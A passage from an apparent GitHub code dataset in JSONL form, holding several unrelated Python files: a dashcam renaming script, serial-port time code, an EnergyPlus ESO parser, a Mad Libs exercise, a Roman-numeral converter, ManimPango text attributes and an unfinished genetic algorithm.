1\n\nfind_specific_users = input(f\"{Fore.RED}Recherche de followers par mots clés pour ensuite les suivre en retour (BETA)? 
{Fore.WHITE}(oui, non): \")\nif (find_specific_users.startswith(\"oui\")):\n keywords = input(\"Entrez des mots clés séparés par une virgule (ex: droit,justice,avocat)\")\n keywords_list = keywords.split(',')\n\nbot.logout()\nprint(\"BYE\")\n","repo_name":"iguene/scapring","sub_path":"tests/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11018448821","text":"\"\"\"A script to concatenate a sequence of video files produced a dashcam into\ncontiguous videos.\n\nFor a set of video files in a directory, this script determines the contiguous\nranges of them and produces a concatenated video file for each contiguous range.\n\nThis script depends on ffmpeg and ffprobe being installed in the system path.\n\"\"\"\nimport datetime\nimport os\n\nfrom labm8.py import app\nfrom util.photolib import dashcam\n\nFLAGS = app.FLAGS\napp.DEFINE_input_path(\n \"working_dir\", os.getcwd(), \"Working directory.\", is_dir=True\n)\napp.DEFINE_integer(\n \"minutes\", 0, \"The number of minutes to offset timestamps by.\"\n)\n\n\ndef main():\n \"\"\"Main entry point.\"\"\"\n working_dir = FLAGS.working_dir\n\n files = [x for x in working_dir.iterdir() if not x.name.startswith(\".\")]\n\n offset = datetime.timedelta(seconds=FLAGS.minutes * 60)\n\n # Work from front to back when offset is negative, else from back to front.\n # This prevents renaming conflicts.\n if offset.seconds < 0:\n order = lambda x: x\n else:\n order = lambda x: reversed(x)\n\n for file in order(list(sorted(files))):\n date = dashcam.ParseDatetimeFromFilenameOrDie(file.name)\n new_name = dashcam.DatetimeToFilename(date + offset)\n\n new_path = file.parent / new_name\n\n app.Log(1, \"Rename %s -> %s\", file.name, new_name)\n assert not new_path.is_file()\n os.rename(file, new_path)\n\n\nif __name__ == \"__main__\":\n app.Run(main)\n","repo_name":"ChrisCummins/phd","sub_path":"util/photolib/photolib-dashcam-tzoffset.py","file_name":"photolib-dashcam-tzoffset.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":181,"dataset":"github-code","pt":"67"} +{"seq_id":"42218427267","text":"from datetime import datetime \nfrom serial import Serial \nfrom struct import unpack\n\nimport time \nimport sys \n\nvel = 115200 \ncomport = Serial('COM3', vel, timeout=1)\n\nfor _ in range(20):\n\n data = datetime.now()\n\n ano, mes, dia = data.year, data.month, data.day\n hora, minuto, segundos = data.hour, data.minute, data.second\n\n data_send = [ano, mes, dia, hora, minuto, segundos ]\n data_bytes = [2, 2, 2, 2, 2, 2]\n\n con = [ int.to_bytes(val, tam, byteorder='little') for val,tam in zip(data_send, data_bytes) ]\n\n values_bytes = b''\n for val in con:\n values_bytes += val \n\n values_bytes += b'\\\\'\n\n print('send: ', data_send, \" Em bytes : \", values_bytes)\n comport.write( values_bytes )\n\n read_from_serial = comport.read(4)\n print('receiving Azemute: ', read_from_serial, \" Decodificado : \", int.from_bytes( read_from_serial, byteorder='little')/100 )\n \n read_from_serial = comport.read(4)\n print('receiving Zenite: ', read_from_serial, \" Decodificado : \", int.from_bytes( read_from_serial, byteorder='little')/100 )\n \n read_from_serial = comport.read(4)\n print('receiving Altura: ', read_from_serial, \" Decodificado : \", int.from_bytes( read_from_serial, byteorder='little')/100 )\n\n\n\n\n 
time.sleep(3)","repo_name":"iOsnaaente/Arduino","sub_path":"Posição-do-sol/Posicao-do-sol/envia_tempo.py","file_name":"envia_tempo.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9887492119","text":"# -*- coding: utf-8 -*-\n\nfrom .epeso_annual_periods import EPEsoAnnualPeriods\nfrom .epeso_annual_variable import EPEsoAnnualVariable\nfrom .epeso_daily_periods import EPEsoDailyPeriods\nfrom .epeso_daily_variable import EPEsoDailyVariable\nfrom .epeso_interval_periods import EPEsoIntervalPeriods\nfrom .epeso_interval_variable import EPEsoIntervalVariable\nfrom .epeso_monthly_periods import EPEsoMonthlyPeriods\nfrom .epeso_monthly_variable import EPEsoMonthlyVariable\nfrom .epeso_runperiod_periods import EPEsoRunPeriodPeriods\nfrom .epeso_runperiod_variable import EPEsoRunPeriodVariable\n\nimport datetime\nimport pandas as pd\n\n\nclass EPEsoSimulationEnvironment():\n \"\"\"A class representing the results from a simulation environment section \n of an `EPEso` instance.\n \n .. note::\n \n An EPEsoSimulationEnvironment instance is returned as the result of \n the `get_environment` or `get_environments` methods.\n It should not be instantiated directly.\n \n .. rubric:: Code Example\n \n .. code-block:: python\n \n >>> from eprun import EPEso\n >>> eso=EPEso(fp=r'files\\eplusout.eso')\n >>> envs=eso.get_environments()\n [EPEsoSimuationEnvironment(environment_title=\"DENVER CENTENNIAL GOLDEN N ANN HTG 99% CONDNS DB\"),\n EPEsoSimuationEnvironment(environment_title=\"DENVER CENTENNIAL GOLDEN N ANN CLG 1% CONDNS DB=>MWB\"),\n EPEsoSimuationEnvironment(environment_title=\"RUN PERIOD 1\")]\n >>> print(envs[0].environment_title)\n DENVER CENTENNIAL GOLDEN N ANN HTG 99% CONDNS DB\n \n \"\"\"\n \n def __repr__(self):\n \"\"\n return 'EPEsoSimuationEnvironment(environment_title=\"%s\")' % self.environment_title\n \n \n @property\n def _data(self):\n \"\"\"The simulation environment dictionary holding the data.\n \n :rtype: dict \n \n \"\"\"\n return self._epeso._data[self._index]\n \n \n @property\n def elevation(self):\n \"\"\"The elevation of the simulation environment section.\n \n :returns: The elevation in metres.\n :rtype: float\n \n \"\"\"\n return float(self._data['elevation'])\n \n \n @property\n def environment_title(self):\n \"\"\"The environment title of the simulation environment section.\n \n :rtype: str\n \n \"\"\"\n return self._data['environment_title']\n\n\n def get_annual_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the annual data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n \n \n def get_annual_periods(self):\n \"\"\"Returns the annual time periods.\n \n :rtype: EPEsoAnnualPeriods\n \n \"\"\"\n p=EPEsoAnnualPeriods()\n p._epesose=self\n return p\n \n \n def get_annual_summary(self):\n \"\"\"Returns a summary of the annual periods and variables.\n \n :rtype: str\n \n \"\"\"\n return ''\n #return '--- TO DO ---'\n \n\n def get_annual_variables(self):\n \"\"\"Return the annual variables.\n \n :rtype: tuple (EPEsoAnnualVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['annual_data']:\n if not report_code==6:\n mv=EPEsoAnnualVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_annual_variable(self,report_code):\n \"\"\"\n \"\"\"\n \n \n def get_daily_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the daily data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n \n 
index=pd.Index(data=self.get_daily_periods().get_periods(),\n                       name='time_periods')\n        column_level_names=('object_name','quantity','unit','value_type')\n        \n        data=[]\n        columns=[[],[],[],[]]\n        \n        for dv in self.get_daily_variables():\n            \n            columns[0]+=[dv.object_name]*5\n            columns[1]+=[dv.quantity]*5\n            columns[2]+=[dv.unit or '-']*5\n            columns[3]+=['value','min_value','min_time','max_value','max_time']\n            \n            data+=[dv.values,\n                   dv.min_values,\n                   dv.get_min_times(),\n                   dv.max_values,\n                   dv.get_max_times()]\n            \n        columns=tuple(zip(*columns))\n        data=tuple(zip(*data))\n        \n        df=pd.DataFrame(index=index,\n                        data=data,\n                        columns=pd.MultiIndex.from_tuples(columns,\n                                                          names=column_level_names))\n        return df\n\n\n    def get_daily_periods(self):\n        \"\"\"Returns the daily time periods.\n        \n        :rtype: EPEsoDailyPeriods\n        \n        \"\"\"\n        p=EPEsoDailyPeriods()\n        p._epesose=self\n        return p\n\n\n    def get_daily_summary(self):\n        \"\"\"Returns a summary of the daily periods and variables.\n        \n        :rtype: str\n        \n        \"\"\"\n        result=[]\n        result.append(self.get_daily_periods().summary())\n        \n        for v in self.get_daily_variables():\n            result.append(v.summary())\n        \n        return '\\n'.join(result)\n    \n    \n    def get_daily_variables(self):\n        \"\"\"Return the daily variables.\n        \n        :rtype: tuple (EPEsoDailyVariable)\n        \n        \"\"\"\n        result=[]\n        for report_code in self._data['daily_data']:\n            if not report_code==3:\n                mv=EPEsoDailyVariable()\n                mv._epesose=self\n                mv._report_code=report_code\n                result.append(mv)\n        return tuple(result)\n    \n    \n    def get_daily_variable(self,report_code):\n        \"\"\"Return a daily variable.\n        \n        :param report_code: The report code of the variable.\n        :type report_code: int\n        \n        :raises KeyError: If a daily variable with the report code does not exist.\n        \n        :rtype: EPEsoDailyVariable\n\n        \"\"\" \n        if report_code in self._data['daily_data']:\n            \n            v=EPEsoDailyVariable()\n            v._epesose=self\n            v._report_code=report_code\n            return v \n        \n        else:\n            \n            raise KeyError('Report code %s does not match any daily variables.' 
% (report_code))\n \n\n def get_interval_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the interval data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n index=pd.Index(data=self.get_interval_periods().get_periods(),\n name='time_periods')\n column_level_names=('object_name','quantity','unit','value_type')\n \n data=[]\n columns=[[],[],[],[]]\n \n for dv in self.get_interval_variables():\n \n columns[0]+=[dv.object_name]\n columns[1]+=[dv.quantity]\n columns[2]+=[dv.unit or '-']\n columns[3]+=['value']\n \n data+=[dv.values]\n \n columns=tuple(zip(*columns))\n data=tuple(zip(*data))\n \n df=pd.DataFrame(index=index,\n data=data,\n columns=pd.MultiIndex.from_tuples(columns,\n names=column_level_names))\n return df\n\n \n def get_interval_periods(self):\n \"\"\"Returns the interval time periods.\n \n :rtype: EPEsoIntervalPeriods\n \n \"\"\"\n p=EPEsoIntervalPeriods()\n p._epesose=self\n return p\n \n \n def get_interval_summary(self):\n \"\"\"Returns a summary of the interval periods and variables.\n \n :rtype: str\n \n \"\"\"\n result=[]\n result.append(self.get_interval_periods().summary())\n \n for v in self.get_interval_variables():\n result.append(v.summary())\n \n return '\\n'.join(result)\n\n\n def get_interval_variable(self,\n report_code):\n \"\"\"Return an interval variable.\n \n :param report_code: The report code of the variable.\n :type report_code: int\n \n :raises KeyError: If an interval variable with the report code does not exist.\n \n :rtype: EPEsoIntervalVariable\n\n \"\"\" \n if report_code in self._data['interval_data']:\n \n v=EPEsoIntervalVariable()\n v._epesose=self\n v._report_code=report_code\n return v \n \n else:\n \n raise KeyError('Report code %s does not match any interval variables.' % (report_code))\n \n \n def get_interval_variables(self):\n \"\"\"Return the interval variables.\n \n :rtype: tuple (EPEsoIntervalVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['interval_data']:\n if not report_code==2:\n v=EPEsoIntervalVariable()\n v._epesose=self\n v._report_code=report_code\n result.append(v)\n return result\n \n \n def get_monthly_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the monthly data.\n \n :rtype: pandas.DataFrame\n \n \"\"\"\n index=pd.Index(data=self.get_monthly_periods().get_periods(),\n name='time_periods')\n column_level_names=('object_name','quantity','unit','value_type')\n \n data=[]\n columns=[[],[],[],[]]\n \n for mv in self.get_monthly_variables():\n \n columns[0]+=[mv.object_name]*5\n columns[1]+=[mv.quantity]*5\n columns[2]+=[mv.unit]*5\n columns[3]+=['value','min_value','min_time','max_value','max_time']\n \n data+=[mv.values,\n mv.min_values,\n mv.get_min_times(),\n mv.max_values,\n mv.get_max_times()]\n \n columns=tuple(zip(*columns))\n data=tuple(zip(*data))\n \n df=pd.DataFrame(index=index,\n data=data,\n columns=pd.MultiIndex.from_tuples(columns,\n names=column_level_names))\n \n return df\n \n \n def get_monthly_periods(self):\n \"\"\"Returns the monthly time periods.\n \n :rtype: EPEsoMonthlyPeriods\n \n \"\"\"\n p=EPEsoMonthlyPeriods()\n p._epesose=self\n return p\n \n \n def get_monthly_summary(self):\n \"\"\"Returns a summary of the monthly periods and variables.\n \n :rtype: str\n \n \"\"\"\n result=[]\n result.append(self.get_monthly_periods().summary())\n \n for v in self.get_monthly_variables():\n result.append(v.summary())\n \n return '\\n'.join(result)\n\n \n def get_monthly_variables(self):\n \"\"\"Return the monthly variables.\n \n :rtype: tuple (EPEsoMonthlyVariable)\n \n \"\"\"\n 
result=[]\n for report_code in self._data['monthly_data']:\n if not report_code==4:\n mv=EPEsoMonthlyVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_monthly_variable(self,report_code):\n \"\"\"Return a monthly variable.\n \n :param report_code: The report code of the variable.\n :type report_code: int\n \n :raises KeyError: If a monthly variable with the report code does not exist.\n \n :rtype: EPEsoMonthlyVariable\n\n \"\"\" \n if report_code in self._data['monthly_data']:\n \n v=EPEsoMonthlyVariable()\n v._epesose=self\n v._report_code=report_code\n return v \n \n else:\n \n raise KeyError('Report code %s does not match any monthly variables.' % (report_code))\n \n \n def get_number_of_variables(self):\n \"\"\"Returns the number of variables in the simulation environment.\n \n :returns: A dictionary with keys as the different variable intervals\n and values as the number of variables.\n :rtype: dict (str,int)\n \n \"\"\"\n return {'interval':len(self.get_interval_variables()),\n 'daily':len(self.get_daily_variables()),\n 'monthly':len(self.get_monthly_variables()),\n 'runperiod':len(self.get_run_period_variables()),\n 'annual':len(self.get_annual_variables())}\n\n \n def get_run_period_dataframe(self):\n \"\"\"Returns a pandas DataFrame from the run period data.\n \n .. note:: Not yet implemented.\n \n \"\"\"\n \n \n def get_run_period_periods(self):\n \"\"\"Returns the run period time periods.\n \n :rtype: EPEsoRunPeriodPeriods\n \n \"\"\"\n p=EPEsoRunPeriodPeriods()\n p._epesose=self\n return p\n \n \n def get_run_period_summary(self):\n \"\"\"Returns a summary of the run period periods and variables.\n \n .. note:: Not yet implemented - currently returns an empty string.\n \n \"\"\"\n return ''\n #return '--- TO DO ---'\n \n \n def get_run_period_variables(self):\n \"\"\"Return the run period variables.\n \n :rtype: tuple (EPEsoRunPeriodVariable)\n \n \"\"\"\n result=[]\n for report_code in self._data['run_period_data']:\n if not report_code==5:\n mv=EPEsoRunPeriodVariable()\n mv._epesose=self\n mv._report_code=report_code\n result.append(mv)\n return tuple(result)\n \n \n def get_run_period_variable(self):\n \"\"\"Return a run period variable.\n \n .. note:: Not yet implemented.\n \n \"\"\"\n \n \n def get_timezone(self):\n \"\"\"Returns the time zone as a datetime.timezone instance.\n \n :rtype: datetime.timezone\n \n \"\"\"\n return datetime.timezone(datetime.timedelta(hours=float(self.time_zone)))\n \n\n def get_variables(self):\n \"\"\"Returns all the variables in the simulation environment.\n \n :returns: A dictionary with keys as the different variable intervals\n and values as the interval objects.\n :rtype: dict(str,list)\n \n \"\"\"\n return {'interval':self.get_interval_variables(),\n 'daily':self.get_daily_variables(),\n 'monthly':self.get_monthly_variables(),\n 'runperiod':self.get_run_period_variables(),\n 'annual':self.get_annual_variables()}\n\n \n \n \n @property\n def latitude(self):\n \"\"\"The latitude of the simulation environment section.\n \n :returns: The latitude in degrees.\n :rtype: float\n \n \"\"\"\n return float(self._data['latitude'])\n \n \n @property\n def longitude(self):\n \"\"\"The longitude of the simulation environment section.\n \n :returns: The longitude in degrees.\n :rtype: float\n \n \"\"\"\n return float(self._data['longitude'][2])\n \n \n \n def summary(self):\n \"\"\"Returns a summary of all the periods and variables in the simulation environment.\n \n :rtype: str\n \n \"\"\"\n return '\\n'.join(['INTERVAL DATA',\n self.get_interval_summary(),\n 'DAILY DATA',\n self.get_daily_summary(),\n 'MONTHLY DATA',\n self.get_monthly_summary(),\n 'RUN PERIOD DATA',\n self.get_run_period_summary(),\n 'ANNUAL DATA',\n self.get_annual_summary()\n ])\n \n \n 
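# Usage sketch (added; illustrative only - instances of this class are\n # normally created by the package's eso parser, so 'env' below stands in\n # for an EPEsoSimulationEnvironment object):\n #\n # >>> print(env.summary()) # all periods and variables\n # >>> df = env.get_interval_dataframe() # MultiIndex-column DataFrame\n # >>> df.to_csv('interval_results.csv')\n 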
\n \n @property\n def time_zone(self):\n \"\"\"The time zone of the simulation environment section.\n \n :rtype: str\n \n \"\"\"\n return self._data['time_zone'][3]\n \n","repo_name":"stevenkfirth/eprun","sub_path":"eprun/_old/epeso_simulation_environment.py","file_name":"epeso_simulation_environment.py","file_ext":"py","file_size_in_byte":16198,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"4211863813","text":"'''\nCreate a Mad Libs program that reads in text files and lets the user add\ntheir own text anywhere the word ADJECTIVE, NOUN, ADVERB, or VERB\nappears in the text file. The program would find these occurrences\nand prompt the user to replace them. The results should be printed\nto the screen and saved to a new text file.\n'''\n\nimport re\n\n# extracting text from file\nfile = open(\"mad_libs_text.txt\")\ntext = file.read()\nfile.close()\n\nkeywords = ('ADJECTIVE', 'NOUN', 'VERB', 'ADVERB')\n\n# detecting keywords and substituting them with user input\ndef replace_keywords(string, keywords_list):\n\n # check each keyword from the list against the string until no match is found\n while True:\n keyword_found = False # flag used to determine if the string had any match during this iteration\n\n for keyword in keywords_list:\n regex = re.compile(r\"{0}\".format(keyword)) # lowercase matches are not included, in case the keyword is part of some larger word\n result = regex.search(string)\n\n user_value = ''\n if result:\n user_value = input(f\"Please enter {keyword}:\\n\")\n keyword_found = True # function won't exit the loop while this flag is True (loop through keys again)\n\n if user_value != '':\n string = regex.sub(user_value, string, count=1) # change 1st occurrence of the keyword\n\n if not keyword_found: # if nothing was found during the last iteration, return the result\n return string\n\n\nresult = replace_keywords(text, keywords)\nprint(result)\n\n# creating new file with results\nnew_file = open(\"mad_libs_new_text.txt\", \"w\")\nnew_file.write(result)\nnew_file.close()\n\n","repo_name":"valievav/automate_the_boring_stuff_with_python","sub_path":"Chapter_08_Reading_and_writing_files/mad_libs.py","file_name":"mad_libs.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30622377889","text":"def roman_to_int(s: str) -> int:\n table = {\n 'I': 1,\n 'V': 5,\n 'X': 10,\n 'L': 50,\n 'C': 100,\n 'D': 500,\n 'M': 1000,\n }\n # For keeping track of the immediate previous letter\n prev = s[0]\n\n total = table[prev]\n for c in s[1:]:\n # Special cases to handle. 
If we found one, we just undo\n # the previous addition (by subtracting it) and add the\n # value of the special case\n if (c == 'V' or c == 'X') and prev == 'I':\n total = total - table[prev] + (table[c] - table[prev])\n elif (c == 'L' or c == 'C') and prev == 'X':\n total = total - table[prev] + (table[c] - table[prev])\n elif (c == 'D' or c == 'M') and prev == 'C':\n total = total - table[prev] + (table[c] - table[prev])\n else:\n # Otherwise, just add the letter value\n total += table[c]\n prev = c\n return total\n\n\nif __name__ == '__main__':\n assert roman_to_int('III') == 3\n assert roman_to_int('LVIII') == 58\n assert roman_to_int('MCMXCIV') == 1994\n","repo_name":"leolas95/devcompzo-interview-questions","sub_path":"technical/roman-to-integer/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"25301084519","text":"# -*- coding: utf-8 -*-\nfrom __future__ import annotations\n\nimport typing as T\n\nfrom ..fonts.enums import Weight\nfrom ..utils import covert_hex_to_rbg\n\n__all__ = [\"TextAttribute\"]\n\n\ndef _parse_color_output(val: T.Union[str, T.Iterable[int]]):\n color_hex = None\n red, green, blue = None, None, None\n if isinstance(val, str):\n color_hex = val\n else:\n if len(val) != 3:\n raise ValueError(\"Either an Iterable of 3 items or a string must be passed.\")\n red, green, blue = val\n if color_hex:\n red, green, blue = covert_hex_to_rbg(color_hex)\n if not ((0 <= red <= 65535) and (0 <= green <= 65535) and (0 <= blue <= 65535)):\n raise ValueError(\"red, green, blue should be between 0 and 65535.\")\n return (red, green, blue)\n\n\nclass TextAttribute:\n \"\"\":class:`TextAttribute` defines the properties/attributes of the\n text within a specific range of the text.\n\n\n A :class:`TextAttribute` object can define multiple properties at\n the same time; for example, it can change the :attr:`background_color`\n as well as the :attr:`foreground_color`. Also, a :class:`TextAttribute` can\n be used multiple times for different texts.\n By default, an attribute has an inclusive range from ``0`` to the\n end of the text ``-1``, ie. ``[0, -1]``.\n \"\"\"\n\n def __init__(\n self,\n start_index: int = 0,\n end_index: int = -1,\n *,\n allow_breaks: bool | None = None,\n background_alpha: float | None = None,\n background_color: T.Union[str, T.Iterable[int]] | None = None,\n foreground_alpha: float | None = None,\n foreground_color: T.Union[str, T.Iterable[int]] | None = None,\n fallback: bool | None = None,\n family: str | None = None,\n weight: Weight | None = None,\n line_height: float | None = None,\n ) -> None:\n \"\"\"Initialize :class:`TextAttribute`.\n\n Parameters\n ----------\n start_index : int, optional\n The start index of the range, by default 0 (start of the string).\n end_index : int, optional\n End index of the range. 
The character at this index is not included\n in the range, by default -1 (end of the string).\n \"\"\"\n self.start_index = start_index\n self.end_index = end_index\n # explicit None checks, so that falsy values such as False or 0.0\n # are not silently ignored\n if allow_breaks is not None:\n self.allow_breaks = allow_breaks\n if background_alpha is not None:\n self.background_alpha = background_alpha\n if background_color is not None:\n self.background_color = background_color\n if foreground_alpha is not None:\n self.foreground_alpha = foreground_alpha\n if foreground_color is not None:\n self.foreground_color = foreground_color\n if fallback is not None:\n self.fallback = fallback\n if family is not None:\n self.family = family\n if weight is not None:\n self.weight = weight\n if line_height is not None:\n self.line_height = line_height\n\n @property\n def start_index(self) -> int:\n \"\"\"It is the start index of the range.\n\n Raises\n ------\n ValueError\n If the value is not an :class:`int`.\n \"\"\"\n return self._start_index\n\n @start_index.setter\n def start_index(self, val: int) -> None:\n if not isinstance(val, int):\n raise ValueError(\"'start_index' should be an int\")\n # check if the value is negative\n if val < 0:\n raise ValueError(\"'start_index' should be a positive int\")\n self._start_index = val\n\n @property\n def end_index(self) -> int:\n \"\"\"It is the end index of the range. The character at this index is not\n included in the range.\n\n Raises\n ------\n ValueError\n If the value is not an :class:`int`.\n \"\"\"\n return self._end_index\n\n @end_index.setter\n def end_index(self, val: int) -> None:\n if not isinstance(val, int):\n raise ValueError(\"'end_index' should be an int\")\n # check if the value is negative\n if val < 0 and val != -1:\n raise ValueError(\"'end_index' should be a positive int\")\n self._end_index = val\n\n @property\n def allow_breaks(self) -> T.Union[bool, None]:\n \"\"\"Whether to break text or not.\n\n If breaks are disabled, the range will be kept in a single run,\n as far as possible.\n \"\"\"\n if hasattr(self, \"_allow_breaks\"):\n return self._allow_breaks\n return None\n\n @allow_breaks.setter\n def allow_breaks(self, val: bool) -> None:\n self._allow_breaks = bool(val)\n\n @property\n def background_alpha(self) -> T.Union[float, None]:\n \"\"\"The background_alpha of the text.\n\n Raises\n ------\n ValueError\n If the value is not between 0 and 1.\n \"\"\"\n if hasattr(self, \"_background_alpha\"):\n return self._background_alpha\n return None\n\n @background_alpha.setter\n def background_alpha(self, val: float) -> None:\n if not (0 <= val <= 1):\n raise ValueError(\"'background_alpha' should be between 0 and 1\")\n self._background_alpha = val\n\n @property\n def background_color(self) -> T.Union[T.Tuple[int], None]:\n \"\"\"The background color of the region.\n\n If the input is a :class:`str` the value is considered as\n string representation of color from\n `CSS Specification `_.\n The color is then parsed and :class:`ValueError` is raised\n if the color is invalid.\n\n If the input is a :class:`collections.abc.Iterable` then the items\n in it are parsed in the order of ``red, green, blue`` and checked\n whether they are valid (between 0 and 65535).\n\n\n Returns either ``None`` or a :class:`tuple` with 3 elements\n representing red, green, blue respectively. The value of each\n item in that tuple ranges from 0 to 65535.\n\n Raises\n ------\n ValueError\n If the value passed isn't a :class:`collections.abc.Iterable` of 3\n elements or a string. 
Another condition when `ValueError` is\n raised is when the color passed is invalid.\n\n \"\"\"\n if hasattr(self, \"_background_color\"):\n return self._background_color\n return None\n\n @background_color.setter\n def background_color(self, val: T.Union[str, T.Iterable[int]]) -> None:\n self._background_color = _parse_color_output(val)\n\n @property\n def foreground_alpha(self) -> T.Union[float, None]:\n \"\"\"The foreground_alpha of the text.\n\n Raises\n ------\n ValueError\n If the value is not between 0 and 1.\n \"\"\"\n if hasattr(self, \"_foreground_alpha\"):\n return self._foreground_alpha\n return None\n\n @foreground_alpha.setter\n def foreground_alpha(self, val: float) -> None:\n if not (0 <= val <= 1):\n raise ValueError(\"'foreground_alpha' should be between 0 and 1\")\n self._foreground_alpha = val\n\n @property\n def foreground_color(self) -> T.Union[T.Tuple[int], None]:\n \"\"\"The foreground color attribute.\n\n If the input is a :class:`str` the value is considered as\n string representation of color from\n `CSS Specification `_.\n The color is then parsed and :class:`ValueError` is raised\n if the color is invalid.\n\n If the input is a :class:`collections.abc.Iterable` then the items\n in it are parsed in the order of ``red, green, blue`` and checked\n whether they are valid (between 0 and 65535).\n\n\n Returns either ``None`` or a :class:`tuple` with 3 elements\n representing red, green, blue respectively. The value of each\n item in that tuple ranges from 0 to 65535.\n\n Raises\n ------\n ValueError\n If the value passed isn't a :class:`collections.abc.Iterable` of 3\n elements or a string. Another condition when `ValueError` is\n raised is when the color passed is invalid.\n\n \"\"\"\n if hasattr(self, \"_foreground_color\"):\n return self._foreground_color\n return None\n\n @foreground_color.setter\n def foreground_color(self, val: T.Union[str, T.Iterable[int]]) -> None:\n self._foreground_color = _parse_color_output(val)\n\n @property\n def fallback(self) -> T.Union[bool, None]:\n \"\"\"Enable or disable fallbacks.\n\n If fallback is disabled, characters will only be used from the\n closest matching font on the system. No fallback will be done to\n other fonts on the system that might contain the characters in\n the text.\n \"\"\"\n if hasattr(self, \"_fallback\"):\n return self._fallback\n return None\n\n @fallback.setter\n def fallback(self, val: bool) -> None:\n self._fallback = bool(val)\n\n @property\n def family(self) -> T.Union[str, None]:\n \"\"\"The font family the text should render. 
Can be a comma separated\n list of fonts in a string.\n\n Raises\n ------\n ValueError\n If value isn't a str.\n \"\"\"\n if hasattr(self, \"_family\"):\n return self._family\n return None\n\n @family.setter\n def family(self, val: str) -> None:\n if not isinstance(val, str):\n raise ValueError(\"'family' must be a string\")\n self._family = val\n\n @property\n def weight(self) -> T.Union[Weight, None]:\n \"\"\"The font weight of the text.\n\n Raises\n ------\n ValueError\n If value isn't a Weight.\n \"\"\"\n if hasattr(self, \"_weight\"):\n return self._weight\n return None\n\n @weight.setter\n def weight(self, val: Weight) -> None:\n if not isinstance(val, Weight):\n raise ValueError(\"'weight' must be a Weight\")\n self._weight = val\n\n @property\n def line_height(self) -> T.Union[float, None]:\n \"\"\"The line height of the text.\n\n Raises\n ------\n ValueError\n If value isn't a float.\n \"\"\"\n if hasattr(self, \"_line_height\"):\n return self._line_height\n return None\n\n @line_height.setter\n def line_height(self, val: float) -> None:\n if not isinstance(val, float):\n raise ValueError(\"'line_height' must be a float\")\n self._line_height = val\n","repo_name":"ManimCommunity/ManimPango","sub_path":"manimpango/attributes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10453,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"67"} +{"seq_id":"19688111763","text":"import random\r\n\r\na_batas_atas = 30\r\nb_batas_atas = 10\r\nc_batas_atas = 10\r\nd_batas_atas = 10\r\n\r\njumlah_populasi = 6\r\n\r\nNUM_GENERATIONS = 50\r\n\r\nCROSSOVER_PROBABILITY = 0.8\r\nMUTATION_PROBABILITY = 0.1\r\n\r\nNUM_ELITES = 5\r\n\r\ndef evaluasi_kromosom(kromosom):\r\n a, b, c, d = kromosom\r\n return abs((a + 4*b + 2*c + 3*d) - 30) \r\n\r\ndef inisialisasi_populasi():\r\n populasi = []\r\n for _ in range(jumlah_populasi):\r\n kromosom = [random.randint(0, a_batas_atas),\r\n random.randint(0, b_batas_atas),\r\n random.randint(0, c_batas_atas),\r\n random.randint(0, d_batas_atas)]\r\n populasi.append(kromosom)\r\n return populasi\r\n\r\ndef select_parents(populasi):\r\n total_fitness = sum(1 / (1 + evaluasi_kromosom(kromosom)) for kromosom in populasi)\r\n probabilities = [(1 / (1 + evaluasi_kromosom(kromosom))) / total_fitness for kromosom in populasi]\r\n \r\n parents = []\r\n for _ in range(jumlah_populasi):\r\n parent = random.choices(populasi, probabilities)[0]\r\n parents.append(parent)\r\n return parents\r\n\r\n\r\ndef crossover(parent1, parent2):\r\n if random.random() < CROSSOVER_PROBABILITY:\r\n crossover_point = random.randint(1, len(parent1) - 1)\r\n child1 = parent1[:crossover_point] + parent2[crossover_point:]\r\n child2 = parent2[:crossover_point] + parent1[crossover_point:]\r\n return child1, child2\r\n else:\r\n return parent1, parent2\r\n\r\ndef mutate(kromosom):\r\n mutated_kromosom = kromosom.copy()\r\n for i in range(len(mutated_kromosom)):\r\n if random.random() < MUTATION_PROBABILITY:\r\n mutated_kromosom[i] = random.randint(0, [a_batas_atas, b_batas_atas, c_batas_atas, d_batas_atas][i])\r\n return mutated_kromosom\r\n\r\ndef select_new_generation(populasi, parents, elites):\r\n new_generation = elites.copy()\r\n while len(new_generation) < jumlah_populasi:\r\n parent1, parent2 = random.sample(parents, 2)\r\n child1, child2 = crossover(parent1, parent2)\r\n new_generation.extend([mutate(child1), mutate(child2)])\r\n return new_generation[:jumlah_populasi]\r\n\r\npopulasi = 
